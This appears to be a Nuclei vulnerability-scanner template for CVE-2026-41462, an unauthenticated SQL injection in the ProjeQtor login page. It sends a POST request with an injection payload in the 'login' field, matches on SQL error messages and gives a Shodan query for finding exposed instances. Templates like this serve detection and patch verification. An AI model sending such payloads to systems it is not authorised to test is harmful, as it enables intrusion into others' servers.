id: CVE-2026-41462

info:
  name: ProjeQtor < 12.4.4 - Unauthenticated SQL Injection in Login
  author: 0xBlackash
  severity: critical
  description: |
    ProjeQtor versions 7.0 through 12.4.3 contain an unauthenticated SQL injection vulnerability in the login functionality.
    The "login" parameter is directly concatenated into a SQL query without sanitization.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41462
    - https://www.vulncheck.com/advisories/projeqtor-unauthenticated-sql-injection-via-login
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-41462
    cwe-id: CWE-89
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"ProjeQtor"
  tags: cve,cve2026,projeqtor,sqli,unauth

http:
  - method: POST
    path:
      - "{{BaseURL}}/login.php"
      - "{{BaseURL}}/projeqtor/login.php"
      - "{{BaseURL}}/login"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    body: |
      login=admin'%3B+SELECT+1%3B--+&password=anything&submit=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SQL syntax"
          - "mysql_fetch"
          - "You have an error in your SQL syntax"
          - "Warning: "
        condition: or

      - type: status
        status:
          - 200
          - 500

      - type: dsl
        dsl:
          - "duration>=0" # basic request succeeded